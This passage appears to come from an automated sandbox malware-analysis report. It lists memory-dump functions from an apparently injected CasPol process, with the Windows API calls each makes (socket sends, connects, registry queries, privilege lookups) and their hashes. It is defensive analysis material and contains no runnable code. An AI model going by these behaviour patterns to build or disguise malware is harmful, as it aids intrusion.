                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 8306559785f6a77e4fc106ee6c4a388ebba4961e41f8f4026337d1e58efae53c
                                          • Instruction ID: 93c3bd7b2bdf1334d9381625f693d0e582933473d99d4a1fbd49edc0cc72bc94
                                          • Opcode Fuzzy Hash: 8306559785f6a77e4fc106ee6c4a388ebba4961e41f8f4026337d1e58efae53c
                                          • Instruction Fuzzy Hash: B511E176500340AFF721CB15DD85B66FBA8DF44720F14C19AFE489B282D2B5A908CEA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3290A Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          • RasConnectionNotificationW.RASAPI32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32963
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ConnectionNotification
                                          • String ID:
                                          • API String ID: 1402429939-0
                                          • Opcode ID: e762ca37cdd301304b14c450aed04ca7ec0e3c71d84ab8b7abd9400392c5e8c4
                                          • Instruction ID: 7eec7b6caa43f2095e914d341d624989586e5f5fe54f4c07efeb800438205a4b
                                          • Opcode Fuzzy Hash: e762ca37cdd301304b14c450aed04ca7ec0e3c71d84ab8b7abd9400392c5e8c4
                                          • Instruction Fuzzy Hash: F011CE75900340AFFB108B11DD88F66FBA8EF08320F08815AED844F251D275A808CAB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45B4E0 Relevance: 1.6, APIs: 1, Instructions: 54comCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: 422a07802005c2ee6cd4091e25cd66de3989acf8d7295f4e769194e8161de7c9
                                          • Instruction ID: 2b88c81d0f1c5c70e88887014d5988679f00c51030c12262f8af01bef19559ce
                                          • Opcode Fuzzy Hash: 422a07802005c2ee6cd4091e25cd66de3989acf8d7295f4e769194e8161de7c9
                                          • Instruction Fuzzy Hash: 9D1160714083849FDB12CF25DC84B52BFA4EF46324F0984DADD858F253D275A849CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: b3a1ce516d14afc88ed2512c069b4dddc8af8e9b128e94e7b00d73e0fb9dff8f
                                          • Instruction ID: cb7953a9c045134c7d4ab79b834b7446b9dd24a115c61bf8ad100c3e6eacfd61
                                          • Opcode Fuzzy Hash: b3a1ce516d14afc88ed2512c069b4dddc8af8e9b128e94e7b00d73e0fb9dff8f
                                          • Instruction Fuzzy Hash: 21119175409780AFDB12CF15DC84B52FFB4EF4A224F08849AED888F253D275A818CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE330CE Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetNetworkParams.IPHLPAPI(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE33124
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: NetworkParams
                                          • String ID:
                                          • API String ID: 2134775280-0
                                          • Opcode ID: e9dcad1e030468aa4b4b6defa624dfd0410408157a0ce91a845587655099a6c0
                                          • Instruction ID: 5b8c9957f0263b5be54bf356058ce1661a8a0ede7612b45a09dded4f0542fa80
                                          • Opcode Fuzzy Hash: e9dcad1e030468aa4b4b6defa624dfd0410408157a0ce91a845587655099a6c0
                                          • Instruction Fuzzy Hash: 6A01A175900244AFFB11CB11DD89F56FBA8DF44721F088156ED449B341D664A808CBB6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A89A Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D45A8E2
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6f97cf5892fdd5827266d3a574234e33fdc697aecb275922b111b6f6086c5cf4
                                          • Instruction ID: a530da1c45414165c437c4552a225febe49ecf0558626d6b3bb461a6de7d9f8a
                                          • Opcode Fuzzy Hash: 6f97cf5892fdd5827266d3a574234e33fdc697aecb275922b111b6f6086c5cf4
                                          • Instruction Fuzzy Hash: BD113CB66003419FEB10CF29D885B67FBE8EF44620F18C4AADD49CB342D675E845CE62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE306F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindClose.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1FE3074C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: 8e063aad7165e52a6c6106058a4475ad722f760caf75f4b61a8076617c0c6233
                                          • Instruction ID: 392e99f4431fa6f3a5e2534f5d024747621105989743a8a380081de5073f6923
                                          • Opcode Fuzzy Hash: 8e063aad7165e52a6c6106058a4475ad722f760caf75f4b61a8076617c0c6233
                                          • Instruction Fuzzy Hash: C511A5755097C09FD7128F15DC84B56FFB4DF47224F0880DAED858F2A3D265A908CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE307DE Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileType.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE30831
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileType
                                          • String ID:
                                          • API String ID: 3081899298-0
                                          • Opcode ID: 1e44327e6db4f699de79eb3324d32532602d19983422239bfa04922d5d2fe472
                                          • Instruction ID: d63bb1a4c9748b5f2cc2e136f83a52e787f03dcf84d0f2630f799d06a3133bfd
                                          • Opcode Fuzzy Hash: 1e44327e6db4f699de79eb3324d32532602d19983422239bfa04922d5d2fe472
                                          • Instruction Fuzzy Hash: 2601C075900344AFF710CB15DD89B56FBACDF44725F08819AEE489F281D674A808CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE336C2 Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 1FE3370E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Connect
                                          • String ID:
                                          • API String ID: 3144859779-0
                                          • Opcode ID: ddda0616714eecee7e9ca96dc80b4a05335e24533a51979e255a62fff8b089c5
                                          • Instruction ID: 059c79bc27e0102653fdef85e6e6d60e7daf79b8f81c7ad13075c18ae69fb209
                                          • Opcode Fuzzy Hash: ddda0616714eecee7e9ca96dc80b4a05335e24533a51979e255a62fff8b089c5
                                          • Instruction Fuzzy Hash: 1C115A75900240AFEB20CF55D888F52FBE4EF08711F0885AAED498B752D375B418DF62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AF32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D45AF82
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: BaseModuleName
                                          • String ID:
                                          • API String ID: 595626670-0
                                          • Opcode ID: b7cc403234a6dfce7e36ecf5c0811c640b4e9abf88662e736aa35ebfa413e320
                                          • Instruction ID: da2f81879634cc5cf463ef093eef8aa8be1b3aafffb10d289e1f80e214ed7c91
                                          • Opcode Fuzzy Hash: b7cc403234a6dfce7e36ecf5c0811c640b4e9abf88662e736aa35ebfa413e320
                                          • Instruction Fuzzy Hash: BE017172900200AFD314DF1ADC85B26FBA9FF88A20F14C55AED089B741E671F915CBE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3378A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FE337CE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 303e0335304f429d9705fb17bc04d9f1600fa70ad6f43bfe6fd054e59e6ef4b6
                                          • Instruction ID: 9338b80b2b6220ceed27d4d3a862ac3a228dbe88ca05e9f7e3628f9c38d5e987
                                          • Opcode Fuzzy Hash: 303e0335304f429d9705fb17bc04d9f1600fa70ad6f43bfe6fd054e59e6ef4b6
                                          • Instruction Fuzzy Hash: 59016172800740EFEB21CF55D988B16FFE0EF48711F08C59AED494B652D276A414DF62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE338EA Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FindWindow
                                          • String ID:
                                          • API String ID: 134000473-0
                                          • Opcode ID: 36916da36c0e69a9d373f1938b61cb870a1a67df1200e09c67bec7da3e0a8f81
                                          • Instruction ID: cdc07b0aee34f771bb2ec868b1248e46c850095bdd18b15023dc18ef7f2a9fc3
                                          • Opcode Fuzzy Hash: 36916da36c0e69a9d373f1938b61cb870a1a67df1200e09c67bec7da3e0a8f81
                                          • Instruction Fuzzy Hash: C3018475D00241DFE710CF16D889B52FBE8EF04625F08C199DD488F36AE274E844CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3188A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • RasEnumConnectionsW.RASAPI32(?,00000EA4,?,?), ref: 1FE318DA
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ConnectionsEnum
                                          • String ID:
                                          • API String ID: 3832085198-0
                                          • Opcode ID: aa9d831fefec1030da09546eec0ef72768e3d4f1ba24eba7782dd0ee2a534f28
                                          • Instruction ID: d40c2d55cb9b49445ab68f5d14d23621c1a575b474cb336abba771dc6b399da4
                                          • Opcode Fuzzy Hash: aa9d831fefec1030da09546eec0ef72768e3d4f1ba24eba7782dd0ee2a534f28
                                          • Instruction Fuzzy Hash: E301A272500200AFD314CF1ACC82B22FBA8FF88A20F14C15AED088B741E671F915CBE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31366 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 1FE313B6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Enum
                                          • String ID:
                                          • API String ID: 2928410991-0
                                          • Opcode ID: 19731aeb51444bf908ecda6eedc19357fafa4669b1cb626b6bfd08d3775930ec
                                          • Instruction ID: eb006c8af1ac34c9553e5c19f8c0139a4f3162684863c2b507827f3aeceb34c3
                                          • Opcode Fuzzy Hash: 19731aeb51444bf908ecda6eedc19357fafa4669b1cb626b6bfd08d3775930ec
                                          • Instruction Fuzzy Hash: CF018F72500200AFD314DF1ACC82B22FBA8FF88A20F14815AED088B741E671F915CBE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31A4E Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • setsockopt.WS2_32(?,?,?,?,?), ref: 1FE31A8C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID:
                                          • API String ID: 3981526788-0
                                          • Opcode ID: cda6b3f6d9eae1d5ba410c85a197a074c66d489732b7146afd7762fed4b56cac
                                          • Instruction ID: 4b58d6b187bebd10a530724c383580fe11f05d4568d39440dee91f3cc8ecb074
                                          • Opcode Fuzzy Hash: cda6b3f6d9eae1d5ba410c85a197a074c66d489732b7146afd7762fed4b56cac
                                          • Instruction Fuzzy Hash: 9F018031900240DFEB20CF55D988B56FBB0EF08322F08C59EDD484F252D275E414CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31606 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1FE31638
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          • Opcode ID: aa5659b7543f1ca3caaf3c61b189022d7859c4a4a81ea0637980d88a7956516d
                                          • Instruction ID: 5ac1a720e63c3d620cd3b4de0ecd10ce73f4184ffae54885e09789d073cd34a2
                                          • Opcode Fuzzy Hash: aa5659b7543f1ca3caaf3c61b189022d7859c4a4a81ea0637980d88a7956516d
                                          • Instruction Fuzzy Hash: 93017C759002409FEB10CF65D988756FBA4EF04221F08C4AEDD498F252D279E858CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A346 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45A378
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: b1b1c4643d71765ec3973f4dbaf63c7cfa2564f7877a1bbd5e7683d606e64c87
                                          • Instruction ID: 060c66113838cbf10466c597ba7e01f3c701b02d1da8e1953fb03e02f00c8ea1
                                          • Opcode Fuzzy Hash: b1b1c4643d71765ec3973f4dbaf63c7cfa2564f7877a1bbd5e7683d606e64c87
                                          • Instruction Fuzzy Hash: 1C01A275500384DFEB11CF15D989756FBE4EF04624F18C4AADD498F742D279A848CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A76E Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D45A7BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: d434056e594e7fa43f92d1b4c227542bf767ea7b5db3541946e092eb5542660b
                                          • Instruction ID: 17c54a5c146009db4fde60e124f0b4777a76b9d97475bb3a0856ab08b8a13236
                                          • Opcode Fuzzy Hash: d434056e594e7fa43f92d1b4c227542bf767ea7b5db3541946e092eb5542660b
                                          • Instruction Fuzzy Hash: 41018471500200AFD314CF1ACC41B22FBA4FF88A20F148159ED084B741D671F515CAE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AB86 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45ABB8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 530d0ab435ef08a4b48364303a8401306cb20c253bdc03f94360c8f3c5e7406f
                                          • Instruction ID: e32c5ede09dac85603a09db175f5ab4dd7bd4eb1a48cbd5523dd13f2cb97d5db
                                          • Opcode Fuzzy Hash: 530d0ab435ef08a4b48364303a8401306cb20c253bdc03f94360c8f3c5e7406f
                                          • Instruction Fuzzy Hash: F9018F755043449FEB10CF19E989756FBA4EF44620F08C4AADE498F742D275E858CFA3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45B396 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D45B3E6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: DisplayNameParse
                                          • String ID:
                                          • API String ID: 3580041360-0
                                          • Opcode ID: 8c268137aefabc0b472e14f437b88541963b39656c9a02b27a32a4a94b8b60b8
                                          • Instruction ID: 171b186e54a27d88f5e72b5c6845e8a39b72a85c336d300a6942cb4097045868
                                          • Opcode Fuzzy Hash: 8c268137aefabc0b472e14f437b88541963b39656c9a02b27a32a4a94b8b60b8
                                          • Instruction Fuzzy Hash: 4D01A272500200AFD314DF1ACC82B22FBA8FF88A20F14C15AED088B741E671F915CBE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: 80f7aad09981eb097a975e41738bd1000d65b4b1866716c222a5738c11319b4d
                                          • Instruction ID: bb1965cde1c52388b1be3d12a95c9ecf9ffe7d5ae2c31fb4d4a4fb5daf227a9f
                                          • Opcode Fuzzy Hash: 80f7aad09981eb097a975e41738bd1000d65b4b1866716c222a5738c11319b4d
                                          • Instruction Fuzzy Hash: 39019E354003409FEB11CF55D989B56FBA0FF08620F08C59ADD488B252D275A858CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3071A Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindClose.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1FE3074C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: a06d10376fc3f5b34c7cdde947a35565139b58090577e122ad153154ac6a81bc
                                          • Instruction ID: f4f0afab32d367d8053015a149e17b7525bff02cb5d22aa62c435a7d64aa83b1
                                          • Opcode Fuzzy Hash: a06d10376fc3f5b34c7cdde947a35565139b58090577e122ad153154ac6a81bc
                                          • Instruction Fuzzy Hash: 3601D1359012409FEB119F15D989766FFA4EF04725F08C0AADE098F352D275B808CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45B50A Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: bc9ea4973ab68d9d2ee7af8273ffe91d1c4ebdec102c9967d1ba4f4c127aceb4
                                          • Instruction ID: dd836b23192f0941a2b35ebed831da491e021c9acbf20c47c4c3b2589e647c38
                                          • Opcode Fuzzy Hash: bc9ea4973ab68d9d2ee7af8273ffe91d1c4ebdec102c9967d1ba4f4c127aceb4
                                          • Instruction Fuzzy Hash: 5101AD75904284DFEB10CF15E988756FBA4EF04725F08C4AADD498F342D279A808CEA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A4B6 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45A4E8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 185a587cbac39579ece969383a68ddbe5b14060ec426895e3d6efe788291c88b
                                          • Instruction ID: 30234e0f593eee41f9778f0855b9d01ec27ee3417a95930e9d6526024c0ad519
                                          • Opcode Fuzzy Hash: 185a587cbac39579ece969383a68ddbe5b14060ec426895e3d6efe788291c88b
                                          • Instruction Fuzzy Hash: 24F0AF355003449FEB10CF05D9C9B26FBA4EF05620F18C09ADD494B352D279B849CEA3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00DAC146 Relevance: 1.5, APIs: 1, Instructions: 12threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646838713.0000000000D90000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_d90000_CasPol.jbxd
                                          Similarity
                                          • API ID: TerminateThread
                                          • String ID:
                                          • API String ID: 1852365436-0
                                          • Opcode ID: 22173c25790b62cbe4d01d1dcdb49ee0d0bacdc3a859db72785e43f755521cde
                                          • Instruction ID: 87ef192e61a5b93e8385c3c60f66e7ed12982c68bc0eaa22be8554d2f1abb646
                                          • Opcode Fuzzy Hash: 22173c25790b62cbe4d01d1dcdb49ee0d0bacdc3a859db72785e43f755521cde
                                          • Instruction Fuzzy Hash: 20D01238A9161E66EF3D26248A702DC6766DF40785FE5913DCCC344458963541C34907
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC6F29 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d]r
                                          • API String ID: 0-2980756583
                                          • Opcode ID: 0ebf612477d8dd4cb9ec27142f6037a88dd0229402f8bb9a70b42950daaf2965
                                          • Instruction ID: b63e812709976f8b6d653a820117cf042a4c7f866f295f89d4cb7cbfa472cac1
                                          • Opcode Fuzzy Hash: 0ebf612477d8dd4cb9ec27142f6037a88dd0229402f8bb9a70b42950daaf2965
                                          • Instruction Fuzzy Hash: A441A030B042109FD714DB79C9A8B6E7BF6AF89700F2544AEE506EB3A1DE35DC058752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC6F80 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d]r
                                          • API String ID: 0-2980756583
                                          • Opcode ID: 8e95c882944fb3c9648fbcdbab074217e2c82a0eeb14cb86f6667cf58b75c9ec
                                          • Instruction ID: 56cb3b3ec281115d9c5350ff45c58fbc337b757270704e43eb9399e3d6d55f66
                                          • Opcode Fuzzy Hash: 8e95c882944fb3c9648fbcdbab074217e2c82a0eeb14cb86f6667cf58b75c9ec
                                          • Instruction Fuzzy Hash: F7317230B002149FDB14DB79C999B6E76FAAFC9700F25406DE506EB3A1DE71AC058B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC3860 Relevance: .7, Instructions: 702COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54615d6bae0edd3252c5e13c3878e1faf654d32d6e99bb710161f73af7a83247
                                          • Instruction ID: 760e3da13135f916763b766ea11a82919691a544e4c927b09530f8381421e805
                                          • Opcode Fuzzy Hash: 54615d6bae0edd3252c5e13c3878e1faf654d32d6e99bb710161f73af7a83247
